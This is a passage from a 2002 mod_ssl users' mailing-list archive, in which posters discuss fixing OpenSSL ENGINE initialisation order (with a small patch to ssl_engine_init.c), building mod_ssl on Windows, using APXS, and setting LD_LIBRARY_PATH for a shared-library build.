RU5DT0QvT1U9UFJFTUlFUiBHUk9VUEUgQURNSU5JU1RSQVRJRi9DTj1SRUNJUElFTlRTL0NOPUZS
RURFUklDAB4A+j8BAAAAFQAAAFN5c3RlbSBBZG1pbmlzdHJhdG9yAAAAAAIB+z8BAAAAHgAAAAAA
AADcp0DIwEIQGrS5CAArL+GCAQAAAAAAAAAuAAAAAwD9P+QEAAADABlAAAAAAAMAGkAAAAAAAwAd
QAAAAAADAB5AAAAAAB4AMEABAAAACQAAAEZSRURFUklDAAAAAB4AMUABAAAACQAAAEZSRURFUklD
AAAAAB4AMkABAAAAFAAAAGp3b29sbGV5QGFwYWNoZS5vcmcAHgAzQAEAAAAUAAAAandvb2xsZXlA
YXBhY2hlLm9yZwAeADhAAQAAAAkAAABGUkVERVJJQwAAAAAeADlAAQAAAAIAAAAuAAAACwApAAAA
AAALACMAAAAAAAMABhDH/fJNAwAHEAEEAAADABAQAAAAAAMAERAAAAAAHgAIEAEAAABlAAAAQ0xJ
RkYsSUNPTVBJTEVVU0lORy0tRU5BQkxFLVJVTEU9U1NMRVhQRVJJTUVOVEFMTElLRUlWRVNFRU5J
VElOT1JERVJUT0VOQUJMRU9QRU5TU0wiRU5HSU5FIlVTRShBTFNPUwAAAAACAX8AAQAAAEcAAAA8
QTlFRTAxMkMwNjg1Q0I0ODk4QTcwRUI0NTk0QTZDQTcxMkU2Q0NAZXhjaGFuZ2UtdWxpcy51bGlz
LnplbmNvZC5jb20+AACizw==

------_=_NextPart_001_01C22C25.3D57F4ED--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 15 20:57:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA23560; Mon, 15 Jul 2002 20:56:44 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange-ulis.ulis.zencod.com id UAA23484; Mon, 15 Jul 2002 20:55:13 +0200 (MET DST)
Subject: RAND function using OpenSSL 0.9.7 (A Solution)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C22C31.1DFE690D"
Date: Mon, 15 Jul 2002 20:54:58 +0200
Message-ID: 
content-class: urn:content-classes:message
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Thread-Topic: RAND function using OpenSSL 0.9.7 (A Solution)
Thread-Index: AcIsMR38Ju931FdeQeqZRNVtc94CeQ==
From: "Frederic DONNAT" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frederic DONNAT" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C22C31.1DFE690D
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable

Hi All,


I change a function call and it works fine now. I do not know if this is =
the real way to solve my problem but this provide a solution.

In file pkg.modssl/ssl_engine_int.c:
move "ssl_init_Engine(s, p);" function call before =
"ssl_init_SSLLibrary();" function call instead of after.
=20
In fact if you want to use ENGINE default functionnalities you muste set =
ENGINE before everything.


Regards
Fred



------_=_NextPart_001_01C22C31.1DFE690D
Content-Type: text/html;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable






RAND function using OpenSSL 0.9.7 (A Solution)





Hi All,





I change a function call and it works fine now. I do not know if this is =
the real way to solve my problem but this provide a solution.



In file pkg.modssl/ssl_engine_int.c:

move "ssl_init_Engine(s, p);" function call before =
"ssl_init_SSLLibrary();" function call instead of after.



In fact if you want to use ENGINE default functionnalities you muste set =
ENGINE before everything.





Regards

Fred









------_=_NextPart_001_01C22C31.1DFE690D--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 15 22:12:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA27318; Mon, 15 Jul 2002 22:11:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from relais.videotron.ca id WAA27292; Mon, 15 Jul 2002 22:10:40 +0200 (MET DST)
Received: from toilet ([24.202.196.150]) by relais.videotron.ca
          (Videotron-Netscape Messaging Server v4.15 MTA-PRD5) with ESMTP
          id GZB41P00.VYS for ; Mon, 15 Jul 2002
          16:10:37 -0400 
Received: from toilet
	([127.0.0.1] helo=localhost ident=geoff)
	by toilet with esmtp (Exim 3.35 #1 (Debian))
	id 17UCB2-0000EP-00; Mon, 15 Jul 2002 16:10:36 -0400
Date: Mon, 15 Jul 2002 16:10:36 -0400 (EDT)
From: Geoff Thorpe 
X-X-Sender: geoff@toilet.localnet
To: modssl-users@modssl.org
Subject: Re: RAND function using OpenSSL 0.9.7 (A Solution)
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Fred,

I was just starting to wonder what might be behind all this when you hit
the nail on the head.

On Mon, 15 Jul 2002, Frederic DONNAT wrote:

> I change a function call and it works fine now. I do not know if this is
> the real way to solve my problem but this provide a solution.
>
> In file pkg.modssl/ssl_engine_int.c:
> move "ssl_init_Engine(s, p);" function call before
> "ssl_init_SSLLibrary();" function call instead of after.
>
> In fact if you want to use ENGINE default functionnalities you muste set
> ENGINE before everything.

That is not *a* solution, it is *the* solution. ssl_init_SSLLibrary() must
be seeding the PRNG, and thus initialising the set-on-first-use pointer in
openssl to a default RAND_METHOD. Do you want to post a patch to the list?
I suggest "diff -u", I suggest a subject starting with "[PATCH]", and I
suggest you CC Ralf. Otherwise, things have a way of slipping through the
net. (Resists temptation to harp on about the simple but important session
caching bug, read "potential security problem", that Ralf still hasn't
incorporated despite me repeatedly harping on about it ...)

Cheers,
Geoff


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 15 22:24:44 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA28201; Mon, 15 Jul 2002 22:23:42 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id WAA28144; Mon, 15 Jul 2002 22:23:04 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g6FKMC4R002048
	for ; Mon, 15 Jul 2002 16:22:12 -0400
Date: Mon, 15 Jul 2002 16:22:12 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: RAND function using OpenSSL 0.9.7 (A Solution)
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 15 Jul 2002, Geoff Thorpe wrote:

> > I change a function call and it works fine now. I do not know if this is
> > the real way to solve my problem but this provide a solution.
> >
> > In file pkg.modssl/ssl_engine_int.c:
> > move "ssl_init_Engine(s, p);" function call before
> > "ssl_init_SSLLibrary();" function call instead of after.
> >
> > In fact if you want to use ENGINE default functionnalities you muste set
> > ENGINE before everything.
>
> That is not *a* solution, it is *the* solution. ssl_init_SSLLibrary() must
> be seeding the PRNG, and thus initialising the set-on-first-use pointer in
> openssl to a default RAND_METHOD. Do you want to post a patch to the list?

Well, I can't do anything about 1.3's mod_ssl, but if somebody can verify
for me that the following fixes Apache 2.0's mod_ssl, I'll commit it.

--Cliff


Index: ssl_engine_init.c
===================================================================
RCS file: /home/cvs/httpd-2.0/modules/ssl/ssl_engine_init.c,v
retrieving revision 1.102
diff -u -d -r1.102 ssl_engine_init.c
--- ssl_engine_init.c   8 Jul 2002 17:43:33 -0000       1.102
+++ ssl_engine_init.c   15 Jul 2002 20:22:13 -0000
@@ -266,6 +266,11 @@

     }

+#ifdef SSL_EXPERIMENTAL_ENGINE
+    /* SSL external crypto device ("engine") support */
+    ssl_init_Engine(base_server, p);
+#endif
+
     ssl_init_SSLLibrary(base_server);

 #if APR_HAS_THREADS
@@ -290,13 +295,6 @@
     if (ssl_tmp_keys_init(base_server)) {
         return !OK;
     }
-
-    /*
-     * SSL external crypto device ("engine") support
-     */
-#ifdef SSL_EXPERIMENTAL_ENGINE
-    ssl_init_Engine(base_server, p);
-#endif

     /*
      * initialize the mutex handling


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 15 23:38:40 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA01486; Mon, 15 Jul 2002 23:37:39 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from priv-edtnes03-hme0.telusplanet.net id XAA01460; Mon, 15 Jul 2002 23:36:37 +0200 (MET DST)
Received: from billhome ([216.232.79.183])
          by priv-edtnes03-hme0.telusplanet.net
          (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with SMTP
          id <20020715213630.LAGA7015.priv-edtnes03-hme0.telusplanet.net@billhome>
          for ; Mon, 15 Jul 2002 15:36:30 -0600
Message-ID: <001301c22c48$13962670$b74fe8d8@billhome>
From: "Bill Angus" 
To: 
References: 
Subject: Re: compile of openssl-0.9.6d stops
Date: Mon, 15 Jul 2002 14:11:19 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Bill Angus" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Strange behavior: The error I recently reported on compiling under WIN2000
with MSVC++ diappeared on re-trying the same compile. First time through an
error was reported and compilation stopped. But the same batch file ran and
completed when tried a second time. This time with no errors.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 16 06:08:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA00547; Tue, 16 Jul 2002 06:07:45 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from odin.its.uow.edu.au id GAA00521; Tue, 16 Jul 2002 06:06:54 +0200 (MET DST)
Received: from mimir.its.uow.edu.au (mimir.its.uow.edu.au [130.130.68.27])
	by odin.its.uow.edu.au (8.12.3/8.12.3) with ESMTP id g6G1scmE009831
	for ; Tue, 16 Jul 2002 11:54:38 +1000 (EST)
Received: from chac.its.uow.edu.au (chac.its.uow.edu.au [130.130.68.5])
	by mimir.its.uow.edu.au (Mirapoint Messaging Server MOS 2.9.3.2)
	with ESMTP id ADE18091;
	Tue, 16 Jul 2002 11:54:37 +1000 (EST)
Received: (from sendmail@localhost)
	by chac.its.uow.edu.au (8.12.3/8.12.3) id g6G1sa0S016824
	for ; Tue, 16 Jul 2002 11:54:36 +1000 (EST)
Received: from wumpus.its.uow.edu.au(130.130.68.12)
	via SMTP by chac.its.uow.edu.au, id smtpd_jaaXG; Tue Jul 16 11:54:33 2002
Received: (from blloyd@localhost)
	by wumpus.its.uow.edu.au (8.12.3/8.12.3) id g6G1sWTl018564
	for modssl-users@modssl.org; Tue, 16 Jul 2002 11:54:32 +1000 (EST)
Date: Tue, 16 Jul 2002 11:54:32 +1000
From: Brendan Lloyd 
To: modssl-users@modssl.org
Subject: Re: Mod_SSL for Windows 2000/NT/XP
Message-ID: <20020716115432.A18366@uow.edu.au>
References: <20020715164214.A3671@uow.edu.au>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: <20020715164214.A3671@uow.edu.au>; from blloyd@uow.edu.au on Mon, Jul 15, 2002 at 04:42:14PM +1000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Brendan Lloyd 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi all, 

I wrote:
> I am a new member to this group. I have a question which was asked on
> 2002-06-07 by Ike Ikonne (for which I could not locate any answer in
> the list archives) so please forgive me for the repetition...
> 
> My situation is like Ike's: I too need to install mod_ssl and Open_SSL
> (ie. require secure web transaction capabilities), with questions as
> follows:
> 
> * How can I build OpenSSL and mod_ssl on NT or 2000 (ie. do I have to
>   buy compiler software)?
> 
> * Alternatively, is there a site from which I can download precompiled
>   versions of (or an "installation Wizard" for) the above?

And last but not least: can anyone clarify what the state of Apache 2.0
is with regards to OpenSSL/mod_ssl?

I've read in some places that Apache 2.0 supports/includes these, but
then when I went to download the Windows binary distribution it had the
suffix "no_ssl"?

What's going on?

Confused,
Brendan Lloyd
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 16 06:26:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA01699; Tue, 16 Jul 2002 06:25:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id GAA01671; Tue, 16 Jul 2002 06:24:48 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id EBC2E4CE691; Tue, 16 Jul 2002 03:06:41 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id B98B32870F; Mon, 15 Jul 2002 21:25:14 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cesam.gfk-palace.org id UAA21413; Mon, 15 Jul 2002 20:08:51 +0200 (MET DST)
Received: from mac.gfk-palace.org ([192.168.0.1])
	by cesam.gfk-palace.org (8.11.6/8.8.7) with ESMTP id g6FI8dl02789
	for ; Mon, 15 Jul 2002 14:08:45 -0400
Mime-Version: 1.0
Message-Id: 
In-Reply-To: <20020715164214.A3671@uow.edu.au>
References: <20020715164214.A3671@uow.edu.au>
Date: Mon, 15 Jul 2002 14:08:37 -0400
To: modssl-users@modssl.org
From: Guillaume Filion 
Subject: Re: Mod_SSL for Windows 2000/NT/XP
Content-Type: text/plain; charset="iso-8859-1" ; format="flowed"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id UAA21420
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Guillaume Filion 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

At 16:42 +1000 15/07/02, Brendan Lloyd wrote:
>I am a new member to this group. I have a question which was asked on
>2002-06-07 by Ike Ikonne (for which I could not locate any answer in
>the list archives) so please forgive me for the repetition...
>
>My situation is like Ike's: I too need to install mod_ssl and Open_SSL
>(ie. require secure web transaction capabilities), with questions as
>follows:
>
>* How can I build OpenSSL and mod_ssl on NT or 2000 (ie. do I have to
>   buy compiler software)?

Yes you can, but you'll need to buy MS Visual C++ to compile Apache.

Instructions are available at:
http://httpd.apache.org/docs/windows.html
http://www.modssl.org/source/exp/mod_ssl/pkg.mod_ssl/INSTALL.Win32

I guess you'll prefer to use the precompiled version avaiable below.

>* Alternatively, is there a sitfrom which I can download precompiled
>   versions of (or an "installation Wizard" for) the above?

I guess this is what you're looking for:
http://www.modssl.org/contrib/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6d-Win32.zip

Hope this helps,
GFK's
-- 
Guillaume Filion
Logidac Tech., Beaumont, Québec, Canada - http://logidac.com/
PGP Key and more: http://guillaume.filion.org/      (this will redirect)
PGP Fingerprint: 14A6 720A F7BA 6C87 2331 33FD 467E 9198 3DED D5CA
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 16 06:26:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA01702; Tue, 16 Jul 2002 06:25:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id GAA01672; Tue, 16 Jul 2002 06:24:48 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id D7D5F4CE5F1; Tue, 16 Jul 2002 03:06:41 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 1FAA6286E5; Mon, 15 Jul 2002 21:25:09 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cesam.gfk-palace.org id TAA20115; Mon, 15 Jul 2002 19:51:19 +0200 (MET DST)
Received: from mac.gfk-palace.org ([192.168.0.1])
	by cesam.gfk-palace.org (8.11.6/8.8.7) with ESMTP id g6FHpHl02731
	for ; Mon, 15 Jul 2002 13:51:17 -0400
Mime-Version: 1.0
Message-Id: 
In-Reply-To: <3D31C18E.70909@ste-land.com>
References: <3D307D99.50807@ste-land.com> <3D3085E9.7070600@ste-land.com>
 <008101c22b36$a1429980$64c8a8c0@balefire10ww>
 <3D31BD85.1070707@ste-land.com> <3D31C18E.70909@ste-land.com>
Date: Mon, 15 Jul 2002 13:51:15 -0400
To: modssl-users@modssl.org
From: Guillaume Filion 
Subject: Re: Success (Was: Re: URGENT: need mod_ssl rpm to work with
 RedHat's apache_1.3.22 rpm on RH6.2)
Content-Type: text/plain; charset="iso-8859-1" ; format="flowed"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id TAA20156
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Guillaume Filion 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

At 14:23 -0400 14/07/02, Shaun T. Erickson wrote:
>I wrote:
>>  Now, I am learning how to build the server and extra modules from 
>>source, so that I: 1) learn how to do it, 2) have the latest 
>>releases to draw upon, instead of Red Hat's lagged-behind software, 
>>with back-ported patches, 3) know exactly how everything is built.
>
>And I have now, after a few hours of  hair pulling, succeeded in 
>building an 
>apache_1.3.26/mm-1.1.3/openssl-0.9.6d/mod_ssl-2.8.10-1.3.26 server.
>
>Now I have to learn how to add php-4.2.1 & mod_perl-1.27 to this mix.
>
>This isn't easy, but a little bit of success sure starts to make it fun. :)

You may want to try out Apache eXtenSions (APXS), which is a nice way 
of working with dynamic shared objects. I discovered this about a 
week ago and I really love it. It makes working with Apache modules 
really easy.

I've set up a small web page giving some recipes for adding APXS 
modules (including php and mod_perl) to Apache:
http://logidac.com/apache/apxs/

Comments and suggestions are welcomed.

You'll notice that mod_ssl is not in the list, because of the bug I 
described in my message from Saturday.

Regards,
GFK's
-- 
Guillaume Filion
Logidac Tech., Beaumont, Québec, Canada - http://logidac.com/
PGP Key and more: http://guillaume.filion.org/      (this will redirect)
PGP Fingerprint: 14A6 720A F7BA 6C87 2331 33FD 467E 9198 3DED D5CA
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 16 06:26:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA01706; Tue, 16 Jul 2002 06:25:44 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id GAA01673; Tue, 16 Jul 2002 06:24:48 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 0C2234CE698; Tue, 16 Jul 2002 03:06:42 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 05C9B2882D; Mon, 15 Jul 2002 21:25:22 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sfoexh01.yipes.com id VAA24301; Mon, 15 Jul 2002 21:10:58 +0200 (MET DST)
Received: by sfoexh01.yipes.com with Internet Mail Service (5.5.2653.19)
	id <3WD36HS0>; Mon, 15 Jul 2002 12:07:16 -0700
Message-ID: <9C67F3C3FD4F3A43BB64A7C60871DC3F31CD6F@sfoexh01.yipes.com>
From: David Loesche 
To: "'modssl-users@modssl.org'" 
Subject: RE: I am having a heck of a time - Please help.
Date: Mon, 15 Jul 2002 12:07:15 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Loesche 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I did read the referred document concerning the build phase.  I am intrigued
by the LD_LIBRARY_PATH suggestion.  What would you recommend I set it to?

-----Original Message-----
From: Boyle Owen [mailto:Owen.Boyle@swx.com]
Sent: Monday, July 15, 2002 12:51 AM
To: modssl-users@modssl.org
Subject: RE: I am having a heck of a time - Please help.

Could be to do with your version of openssl lib (check it is reasonably up
to date) or with your LD_LIBRARY_PATH environment variable..

Check out http://www.delouw.ch/linux/Apache-Compile-HOWTO/html/apache.html

for a good user's summary.

Rgds,

Owen Boyle

>-----Original Message-----
>From: David Loesche [mailto:DLoesche@yipes.com]
>Sent: Freitag, 12. Juli 2002 20:12
>To: 'modssl-users@modssl.org'
>Subject: I am having a heck of a time - Please help.
>
>
>I have poured through all the documentation I can find on
>enabling mod_ssl
>with Apache 1.3.26 but keep coming up short.  If I static link
>the mod_ssl
>it works fine but when I try to enable DSO and use it as a
>shared library I
>keep getting ap_add_config_define : referenced symbol not
>found.  I have the
>following config setup for the apache build:
>
>#!/bin/ksh
>SSL_BASE=/usr/local/ssl \
>EAPI_MM=../mm-1.1.3 \
>EAPI_MM_CORE_PATH=logs/httpd.mm \
>LIBS=/usr/lib/libC.so.5 \
>CFLAGS=-fPIC \
>./configure    --prefix=/opt/apache \
>               --enable-rule=EAPI \
>               --enable-module=ssl \
>               --enable-shared=ssl \
>               --disable-rule=SSL_COMPAT \
>               --enable-rule=SSL_SDBM \
>               --enable-suexec \
>               --suexec-caller=http
>
>I have followed the instructions in the modssl install guide to patch
>Apache.  Please verify the following build for mod_ssl:
>
>./configure    --with-apache=../apache_1.3.26 \
>               --with-ssl=/usr/local/ssl \
>               --with-mm=../mm-1.1.3
>
>If you can help (point me to some documentation) I would be
>very grateful...
>
>
>David S. Loesche
>david.loesche@yipes.com                        Yipes
>Communications, Inc.
>Main:  (415) 901-2000                  114 Sansome Street, Suite 1045
>Direct:        (415) 901-2210                  San Francisco, CA 94104
>Fax:   (415) 901-2201                  http://www.yipes.com
>
>Yipes is the defining provider of fully scalable bandwidth for
>businesses.
>We offer fully managed high-speed Internet and Nationwide LAN-to-LAN
>services at speeds ranging from 1 Mbps to 1 Gbps, in 1 Mbps
>increments.
>
>Yipes delivers this uniquely flexible service over the first nationwide
>system of optical IP networks.
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 16 06:35:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA02178; Tue, 16 Jul 2002 06:34:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from odin.its.uow.edu.au id GAA02140; Tue, 16 Jul 2002 06:33:43 +0200 (MET DST)
Received: from mimir.its.uow.edu.au (mimir.its.uow.edu.au [130.130.68.27])
	by odin.its.uow.edu.au (8.12.3/8.12.3) with ESMTP id g6G4XfmE019281
	for ; Tue, 16 Jul 2002 14:33:41 +1000 (EST)
Received: from chac.its.uow.edu.au (chac.its.uow.edu.au [130.130.68.5])
	by mimir.its.uow.edu.au (Mirapoint Messaging Server MOS 2.9.3.2)
	with ESMTP id ADE28622;
	Tue, 16 Jul 2002 14:33:40 +1000 (EST)
Received: (from sendmail@localhost)
	by chac.its.uow.edu.au (8.12.3/8.12.3) id g6G4XeMt021372
	for ; Tue, 16 Jul 2002 14:33:40 +1000 (EST)
Received: from wumpus.its.uow.edu.au(130.130.68.12)
	via SMTP by chac.its.uow.edu.au, id smtpdQva4SP; Tue Jul 16 14:33:38 2002
Received: (from blloyd@localhost)
	by wumpus.its.uow.edu.au (8.12.3/8.12.3) id g6G4Xclf028981
	for modssl-users@modssl.org; Tue, 16 Jul 2002 14:33:38 +1000 (EST)
Date: Tue, 16 Jul 2002 14:33:38 +1000
From: Brendan Lloyd 
To: modssl-users@modssl.org
Subject: Re: Mod_SSL for Windows 2000/NT/XP
Message-ID: <20020716143338.A26548@uow.edu.au>
References: <20020715164214.A3671@uow.edu.au> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: ; from gfk@logidac.com on Mon, Jul 15, 2002 at 02:08:37PM -0400
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Brendan Lloyd 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Guillaume wrote:
> Yes you can, but you'll need to buy MS Visual C++ to compile Apache.
> Instructions are available at:
> http://httpd.apache.org/docs/windows.html
> http://www.modssl.org/source/exp/mod_ssl/pkg.mod_ssl/INSTALL.Win32

I note that the modssl install instructions are out of date (as are
the versions of required software referenced). For example, the CygWin
version has been deprecated since about 1998!

> I guess you'll prefer to use the precompiled version avaiable below.

Yes, absolutely!

> >* Alternatively, is there a sitfrom which I can download precompiled
> >   versions of (or an "installation Wizard" for) the above?

> I guess this is what you're looking for:
> http://www.modssl.org/contrib/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6d-Win32.zip

Eureka! I LOVE u, Guillaume!!!! Thank you soooo much!

Much relieved,
Brendan
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 16 06:38:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA02346; Tue, 16 Jul 2002 06:37:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from statler.squaretrade.com id GAA02321; Tue, 16 Jul 2002 06:36:46 +0200 (MET DST)
Received: from glen by statler.squaretrade.com with local (Exim 3.35 #1 (Debian))
	id 17UK3M-0008QM-00
	for ; Mon, 15 Jul 2002 21:35:12 -0700
Date: Mon, 15 Jul 2002 21:35:12 -0700
To: modssl-users@modssl.org
Subject: Re: I am having a heck of a time - Please help.
Message-ID: <20020716043512.GC18990@squaretrade.com>
References: <9C67F3C3FD4F3A43BB64A7C60871DC3F31CD6F@sfoexh01.yipes.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <9C67F3C3FD4F3A43BB64A7C60871DC3F31CD6F@sfoexh01.yipes.com>
User-Agent: Mutt/1.3.28i
From: Glen Mehn 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Glen Mehn 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

well, the LD_LIBRARY_PATH should point to all the shared libs that
you'll need. Probably

/usr/lib:/lib:/usr/local/lib:/usr/local/ssl/lib

is a good start

-g

On Mon, Jul 15, 2002 at 12:07:15PM -0700, David Loesche wrote:

> I did read the referred document concerning the build phase.  I am intrigued
> by the LD_LIBRARY_PATH suggestion.  What would you recommend I set it to?
> 
> -----Original Message-----
> From: Boyle Owen [mailto:Owen.Boyle@swx.com]
> Sent: Monday, July 15, 2002 12:51 AM
> To: modssl-users@modssl.org
> Subject: RE: I am having a heck of a time - Please help.
> 
> Could be to do with your version of openssl lib (check it is reasonably up
> to date) or with your LD_LIBRARY_PATH environment variable..
> 
> Check out http://www.delouw.ch/linux/Apache-Compile-HOWTO/html/apache.html
> 
> for a good user's summary.
> 
> Rgds,
> 
> Owen Boyle
> 
> >-----Original Message-----
> >From: David Loesche [mailto:DLoesche@yipes.com]
> >Sent: Freitag, 12. Juli 2002 20:12
